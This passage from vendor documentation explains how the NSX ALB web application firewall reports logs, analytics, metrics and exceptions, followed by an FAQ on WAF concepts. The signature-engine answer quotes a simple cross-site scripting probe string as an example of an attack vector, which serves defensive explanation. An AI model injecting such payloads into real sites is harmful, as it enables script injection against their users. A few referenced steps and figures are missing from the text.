- URI: URL of the evaluated traffic.
- Request: Request type.
- Response: Response code.
- Length: Size of the response body.
- Duration/Timeline: Duration of the traffic.
The WAF result column in the WAF Log Analytics entry refers to the result of the WAF evaluation. The
following are the possible outcomes:
- REJECTED: The policy is in enforcement mode and the request was rejected.
- PASSED: The request passed the WAF policy without any match.
- Not applicable: The request was not evaluated by WAF.
Detailed Log Information
Clicking on the + sign at the end of each log entry expands the panel to provide more details:
- Significance: Indicates a WAF policy match.
- Whether the request was rejected or not.
- Each matched rule is shown as an entry consisting of the following fields:
  - All tags assigned to the rule
From a rule entry, an exception for a false-positive remediation can be added. The exception is
activated immediately.
WAF Analytics
This section explains WAF Analytics.
1 Navigate to Applications > Virtual Services.
2 Click on the virtual service mapped to the WAF policy.
The analytics are displayed based on the time frame chosen, such as Displaying Past Week, Displaying
Past 6 Hours, etc. The new WAF log analytics items can now be used in conjunction with the already
existing analytics, for example a filter along with the CRS_949_Anomaly_Evaluations rule group under
WAF Groups in the Analytics tab.
- Overview of the tags that were hit during the selected time frame.
- Overview of the rules that were hit during the selected time frame.
- Overview of the groups that were hit during the selected time frame. Groups can be expanded to
show the distribution by rule.
- Summary of the latency in microseconds for the log entries in a given time frame.
WAF Metrics
This section discusses WAF Metrics. To view WAF related metrics, do the following:
1 Navigate to Applications > Virtual Services.
The WAF metrics show the denied requests and their corresponding trigger.
In case of a false positive, any rule or group can be disabled by using the toggle button.
Combinations displays the known combinations and their hit counts related to the chosen filter.
The filter can be reset by clicking on Reset filters.

Preview Exceptions
This section discusses Preview Exceptions for the selected combination.
1 Click Preview Exception to view the exception on the right-side pane.
Once applied, the exception is activated immediately. The exception is derived from the elements
of the filter, as shown below:

Preview Logs
This section explains Preview Logs. Click the Preview Logs button to view the log entries that match the
elements that are selected.

Viewing Events for Debugging WAF Signature
You can view events for debugging WAF signature issues as follows:
5 FAQs
Frequently Asked Questions and Answers are as below:

What are the traditional WAF challenges that NSX ALB has tried to solve?
The WAF solution secures the customer's applications as follows:
- Security: Combines different verification methods to provide a comprehensive security layer
(Signatures, Positive Rules, Client Reputation, Machine Learning, Outlier analysis and others).
- Automation: Supports automation tools (Ansible, Terraform etc.) and can be integrated into an SDLC (Secure Development Life Cycle).
- Visibility: Insights into applications and clients.
- Ease of use & Simplicity: The WAF solution gathers data, learns from the data and
auto-tunes the policy or helps the admin to adjust the policy quickly. That is, the WAF solution
has a "Make me secure" button in green.
- Performance: Measurements are provided to validate it.

What are the features provided as part of WAF?
The WAF features are as follows:
- OWASP Top 10 Protection
- Input Validation: XSS, SQLi etc.
- Positive Security Model via Application Learning
- Scripting for application logic flaws, using Data Scripts
- API protection for JSON, XML
- Simplified Policy Definition
- Elasticity and Automation
Also, the security module includes more features as listed below:
- Application Rate Limiting
Does NSX ALB provide WAF as a service?
As of today, the WAF (or LB) is not offered as a cloud service and is deployed in the customer
environment. However, an as-a-service offering is planned in the near future. The WAF (or LB) is
similar to a physical WAF in terms of on-prem deployment and has better operational, scale,
performance, and visibility characteristics. Also, NSX ALB offers SaaS that includes WAF as part of
the LB offering. For more information about SaaS, refer to https://avinetworks.com/saas/

What is the sizing recommendation for WAF?
The performance and sizing recommendation for WAF depends on the type of application, the
number of headers, POST vs GET and so on. Since this information is usually not available up front, it
is suggested that an average of 800 RPS per Service Core and about 1600 RPS for two Service Cores is
considered.

What is the HA recommendation for WAF?
As the WAF solution is part of a larger LB/ADC offering, HA is definitely recommended for any
LB/WAF deployment. By default, it supports Active/Active HA and the other supported HA types
are Active/Standby and N+M.

Do we need a separate license for WAF?
Since the WAF solution is part of a larger LB/ADC offering, a separate license for WAF is not required.
However, make sure the SE sizing is adjusted based on the WAF.

What is Positive Security Model?
The "Positive Security Model" is also called "Application specific policy". It describes the
application behaviour and provides input validation by setting an accepted range (and length)
of characters. If the input does not match the validation specification, it is reported as a policy
violation. It describes "how the request should look like (part of)".

What does Signature Engine do?
The Signature engine performs input validation by observing the input pattern and searching for
attack vectors. Example (simple XSS): attack="><script>alert(1)</script>
It describes "how does an attack look like", which can be formulated as "how the request should
not look like".

What does Allowlist do?
The component "Allowlist" decides whether a request should be checked by the WAF or not. For
example, customers may prefer to bypass WAF for all POST requests to /upload.php.

What is Learning?
Learning is a method of collecting statistical information about an application's normal
usage in order to generate a "Positive Security Model".

What is WAF processing flow?
The WAF processing flow is as follows:
1 If a request matches an Allowlist condition, the request is whitelisted, i.e., WAF processing is
turned off for that request.
2 The positive security engine checks whether the request is in line with the learnt data.
3 If a request is marked as illegitimate by the positive security engine, it is flagged/blocked
immediately.
4 Otherwise, the request is processed by the signature engine, which verifies by matching parts of
the request against a valid signature in order to identify the attack vector.
5 If WAF is in Enforcement mode, it blocks the request.

What is False Positive?
Sometimes a legitimate request is flagged as an attack. This may affect the business and also
develop fear among customers.

What is False Negative?
When an attack is not detected, it is called a False Negative. This affects the security but not the
business (in the perception of the user). However, the site continues to work.

What is an exclusion for false positive mitigation?
An exclusion adds a matching condition of <IP, URL, parameter> in front of a signature rule or a
rule group. In this way, a false positive that exists within the policy and application is not
triggered.